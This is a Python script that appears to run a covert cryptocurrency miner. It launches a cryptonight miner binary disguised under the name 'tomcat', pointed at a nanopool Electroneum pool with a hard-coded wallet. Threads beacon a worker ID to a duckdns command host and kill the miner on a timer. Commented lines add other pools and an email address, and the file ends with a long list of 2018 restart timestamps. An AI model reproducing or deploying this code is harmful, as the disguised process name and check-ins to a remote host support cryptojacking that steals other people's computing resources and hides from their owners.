import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:53:05.582545
#2018-02-17 17:42:05.297922
#2018-02-17 19:28:07.232070
#2018-02-17 21:19:03.399245
#2018-02-17 23:03:05.678490
#2018-02-18 00:51:02.116073
#2018-02-18 02:39:01.867254
#2018-02-18 04:27:07.178660
#2018-02-18 06:21:05.462549
#2018-02-18 08:10:06.663117
#2018-02-18 09:57:05.712746
#2018-02-18 11:44:07.368868
#2018-02-18 13:29:05.175997
#2018-02-18 15:18:07.620493
#2018-02-18 17:07:04.741816
#2018-02-18 18:54:01.786203
#2018-02-18 20:42:01.454935
#2018-02-18 22:27:04.566971
#2018-02-19 00:16:03.964106
#2018-02-19 02:02:01.516869
#2018-02-19 03:49:06.241779
#2018-02-19 05:34:07.742700
#2018-02-19 07:22:07.458587
#2018-02-19 09:12:06.557549
#2018-02-19 11:02:04.692186
#2018-02-19 12:48:05.007652
#2018-02-19 14:35:09.742973
#2018-02-19 16:24:06.963296
#2018-02-19 18:11:01.648373
#2018-02-19 19:57:01.294487
#2018-02-19 21:46:05.862811
#2018-02-19 23:33:01.555080
#2018-02-20 01:18:01.933226
#2018-02-20 03:08:07.286534
#2018-02-20 04:55:01.920357
#2018-02-20 06:37:08.178451
#2018-02-20 08:22:01.480575
#2018-02-20 10:07:07.637533
#2018-02-20 11:51:09.439892
#2018-02-20 13:39:09.238568
#2018-02-20 15:22:01.354466
#2018-02-20 17:08:06.435987
#2018-02-20 18:58:08.340715
#2018-02-20 20:48:10.057079
#2018-02-20 22:34:01.695931
#2018-02-21 00:15:01.469117
#2018-02-21 02:02:05.078817
#2018-02-21 03:48:07.520726
#2018-02-21 05:31:02.036871
#2018-02-21 07:19:05.950289
#2018-02-21 09:04:04.680553
#2018-02-21 10:52:07.236904
#2018-02-21 12:38:01.792724
#2018-02-21 14:24:05.443766
#2018-02-21 16:12:02.049996
#2018-02-21 18:03:01.691114
#2018-02-21 19:49:08.440091
#2018-02-21 21:37:08.234561
#2018-02-21 23:23:07.003996
#2018-02-22 01:12:07.148965
#2018-02-22 02:59:05.695214
#2018-02-22 04:45:04.023058
#2018-02-22 06:30:07.447326
#2018-02-22 08:17:08.586743
#2018-02-22 10:05:10.739967
#2018-02-22 11:49:07.999662
#2018-02-22 13:34:09.258191
#2018-02-22 15:22:01.463231
#2018-02-22 17:07:08.830152
#2018-02-22 18:54:08.337896
#2018-02-22 20:47:07.257539
#2018-02-22 22:34:07.578120
#2018-02-23 00:19:01.822538
#2018-02-23 02:08:03.292313
#2018-02-23 03:56:06.864544
#2018-02-23 05:43:05.691855
#2018-02-23 07:28:05.592772
#2018-02-23 09:32:03.897693
#2018-02-23 11:38:07.683411
#2018-02-23 13:27:01.889072
#2018-02-23 15:12:09.912626
#2018-02-23 17:02:09.718963
#2018-02-23 18:51:04.289049
#2018-02-23 20:37:03.898188
#2018-02-23 22:23:06.834128
#2018-02-24 00:09:07.440121
#2018-02-24 02:01:07.594011
#2018-02-24 03:52:01.392647
#2018-02-24 05:39:06.223774
#2018-02-24 07:29:06.555436
#2018-02-24 09:17:04.831700
#2018-02-24 11:12:05.239654
#2018-02-24 13:01:06.118920
#2018-02-24 14:49:01.786065
#2018-02-24 16:41:06.414569
#2018-02-24 18:30:05.508719
#2018-02-24 20:16:01.234342
#2018-02-24 22:07:05.528706
#2018-02-25 01:05:06.275173
#2018-02-25 04:31:07.603255
#2018-02-25 07:58:03.377993